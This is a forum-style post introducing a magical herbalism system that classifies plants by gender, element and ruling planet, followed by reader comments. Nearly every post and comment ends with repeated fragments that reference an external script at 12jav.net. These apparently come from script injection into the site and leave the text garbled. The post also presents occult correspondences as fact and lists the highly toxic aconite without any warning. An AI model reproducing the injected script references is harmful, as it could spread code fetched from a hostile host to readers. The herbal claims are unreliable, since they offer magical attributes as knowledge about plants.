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I want to share with you my little knowledge of herbalism. I saw that many people interested in learning this art, so here are a small guide. I call it "247 system", now you will see why.

Classification of plants:

We can classify plants according to three principles, gender(2), element(4) and ruling planet(7). This is a general classification, each plant has its own purpose but this way we can have an idea of the type of dominant energy possessed by each plant. Of course, a single plant may have several key attributes. But first things first.

Gender - 2

Male plants: powerful energy, used for protection, health, strength ... (sunflower, dandelion, sage ...)

Female plants: subtle energy, used to love, reconciliation, development of psychic powers, divination ... (millefolium, mugwort, vervain ...)

Element - 4

Earth: Prosperity, abundance, wealth ... (mugwort, vervain)

Air: Wisdom, divination, purification ... (sage, dandelion)

Fire: Power, courage, transformation ... (basil, rosemary)

Water: Emotions, love, friendship ... (lettuce, althea officinalis)


Ruling Planet - 7

Sun: Healing, protection (rosemary, bay)

Moon: Fertility, healing, dreams (mauve, lily)

Mercury: Wisdom, divination, psychic powers (mint, thyme)

Venus: Beauty, love, friendship (mugwort, vervain)

Mars: Strength, purification, courage (basil, ginger)

Jupiter: Legal, wealth (clove, sage)

Saturn: Exorcism, longevity (aconite, ivy)

If you people want to know more, leave a comment below, this is only an introduction. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
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Dose the elements and planet have gender to? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
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If you look closely, you see that everything is a mixture(in one degree or another) of the first principle, call it Ying-Yang, negative-positive ... sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
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Oh! Okay thanks. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
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Love it!

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This is a great article :) I have hyssop and feverfew what would that be classified as? what are their best uses. It's my first time growing them sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
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I have some dandelion growing in my yard. What are the leaves best for when made into a tea? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
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Are all the herbs classified into the three categories? This post clarified some aspects of herbalism for me and I'd love to read more about it from you. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
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